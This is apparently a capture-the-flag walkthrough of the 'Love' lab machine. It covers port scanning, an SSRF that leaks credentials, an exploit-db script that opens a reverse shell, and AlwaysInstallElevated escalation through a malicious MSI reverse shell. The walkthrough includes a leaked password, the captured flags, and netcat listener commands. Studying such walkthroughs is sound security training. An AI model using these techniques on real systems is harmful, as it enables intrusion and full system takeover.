-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Mon Jan 10 17:31:43 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.239
Warning: 10.10.10.239 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.239
Host is up (0.062s latency).
Not shown: 59778 closed tcp ports (reset), 5738 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
5000/tcp open upnp
5040/tcp open unknown
5985/tcp open wsman
5986/tcp open wsmans
7680/tcp open pando-pub
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
# Nmap done at Mon Jan 10 17:32:10 2022 -- 1 IP address (1 host up) scanned in 27.61 seconds
As we see there are quite a lot of ports open.
Let's try to obtain the services and versions of these ports. The following command will scan these ports more in depth and save the result into a file:
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Mon Jan 10 17:35:33 2022 as: nmap -sCV -p80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665 -oN targeted 10.10.10.239
Nmap scan report for 10.10.10.239
Host is up (0.065s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: Voting System using PHP
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
| tls-alpn:
|_ http/1.1
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| FourOhFourRequest, SSLSessionReq:
|_ Host '10.10.14.18' is not allowed to connect to this MariaDB server
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2022-01-10T17:00:06+00:00; +21m35s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after: 2024-04-10T14:39:19
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.92%I=7%D=1/10%Time=61DC6065%P=x86_64-pc-linux-gnu%r(SS
SF:LSessionReq,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.18'\x20is\x20not
SF:\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Fou
SF:rOhFourRequest,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.18'\x20is\x20
SF:not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h21m35s, deviation: 4h00m01s, median: 21m34s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Love
| NetBIOS computer name: LOVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-01-10T08:59:52-08:00
| smb2-time:
| date: 2022-01-10T16:59:54
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 10 17:38:32 2022 -- 1 IP address (1 host up) scanned in 178.95 seconds
There is quite a lot of information. Let's start with the basics. In the first place, I see there is an HTTPS service running on port 443. Let's inspect the SSL certificate with the following command:
openssl s_client -connect 10.10.10.239:443
s_client implements a generic SSL/TLS client.
-connect tests connectivity to an HTTPS service..
At some point we should see this:
Certificate chain
0 s:C = in, ST = m, L = norway, O = ValentineCorp, OU = love.htb, CN = staging.love.htb, emailAddress = roy@love.htb
i:C = in, ST = m, L = norway, O = ValentineCorp, OU = love.htb, CN = staging.love.htb, emailAddress = roy@love.htb
Now we know that the common name (CN) is staging.love.htb and the Organization Unit (OU) is love.htb. Let's add both to the /etc/hosts file and see if there is Virtual Hosting.
Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server.
Let's see what appears with each domain name. If we open our browser, and search for http://10.10.10.239, we will see a login page that require an ID and a password.
If we search for http://staging.love.htb, we should see a Free File Scanner website.
Exploitation
All the other domain names will show us a 403 Forbidden message, so let's inspect this page a bit further. If we click on Demo, we should see something interesting. The webpage allow us to see the content of an especific URL.
Let's try something, if you look carefully at the nmap scan, you could see there is another HTTP service running on port 5000, but if try to see it's content on the browser we get the 403 Forbidden message.
But maybe we could see it's content with the utility we found on the Demo page. All we have to do is specify the http://localhost:5000 URL.
And we got some credentials! This attack is called Server Side Request Forgery (SSRF).
Server Side Request Forgery (SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing.
In a typical SSRF attack, the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure.
So now we have credentials, but for what? On http://10.10.10.239 there was a login page, but it was asking for an ID and a password, and we have a user and password. So that's not going to work. Let's try to list directories with gobuster.
gobuster dir -u http://10.10.10.239 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200
dir enumerates directories or files.
-u the target URL.
-w path to the wordlist.
-t number of current threads, in this case 200 threads.
Gobuster found an /Admin directory, let's take a look at it.
This login page is a bit different, becouse it is asking for a username and a password. Let's try the credentials we found earlier.
And we got in! At this point I tried to look for common exploits on exploit-db.
Exploit-DB is a great database of exploits and proof-of-concepts used by penetration testers and vulnerability researchers.
# --- Edit your settings here ----
IP = "10.10.10.239" # Website's URL
USERNAME = "admin" #Auth username
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.14.12" # Reverse shell IP
REV_PORT = "8888" # Reverse port
# --------------------------------
Let's set a netcat listener on port 8888.
nc -lvnp 8888
-llisten mode.
-vverbose mode.
-nnumeric-only IP, no DNS resolution.
-p specify the port to listen on.
And if we run the exploit, we should get a shell as the user phoebe and we could grab the user flag.
python3 exploit.py
listening on [any] 8888 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.239] 60626
b374k shell : connected
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe
C:\xampp\htdocs\omrs\images>type c:\users\phoebe\desktop\user.txt
type c:\users\phoebe\desktop\user.txt
b195b1d1c75beff2ccb8c1b4d46bdb74
Privilege Escalation
Time to become the NT AUTHORITY\SYSTEM user. If you try to enumerate the system manually, you will not find much. Let's run WinPEAS and see what it tell us.
WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. You can download it from the official Github page:
Let's set a SimpleHTTPServer with python on our current directory.
python -m SimpleHTTPServer
Now on the victim machine let's run the following command in order to download the winPEAS binary from our machine.
If we run the binary a lot of text appear. But at some point we should see the following information:
Íš Checking AlwaysInstallElevated
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
It looks like AlwaysInstallElevated is set to 1 in both HKLM and HKCU registries. If you do your research on how to escalate privileges with the AlwaysInstallElevated set to 1 in bothregistries, you will notice that we can run Microsoft Windows Installer Package (MSI) with system privileges.
As we can run MSI files with elevated privileges, the idea is to create a malicious MSI file that sends our machine a reverse shell as the NT AUTHORITY\SYSTEM user. Let's create this malicious file from our machine with msfvenom.
Before running the MSI file, let's set another netcat listener on port 4444.
nc -lvnp 4444
-llisten mode.
-vverbose mode.
-nnumeric-only IP, no DNS resolution.
-p specify the port to listen on.
To run the malicious MSI file we have to execute the following command:
msiexec /i reverse.msi
And we get the shell as the NT AUTHORITY\SYSTEM user. Finally, all we have to do is reap the harvest and take the root flag.
listening on [any] 4444 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.239] 60637
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>type c:\users\administrator\desktop\root.txt
type c:\users\administrator\desktop\root.txt
b386de5a9e7f3c5aa500dff096f96ba8
And I found a script coded in python. Before running it, we have to change the website address, the username, the password, out local IP address and a port i which we will be listening on.
The following link explains how to exploit this vulnerability: .
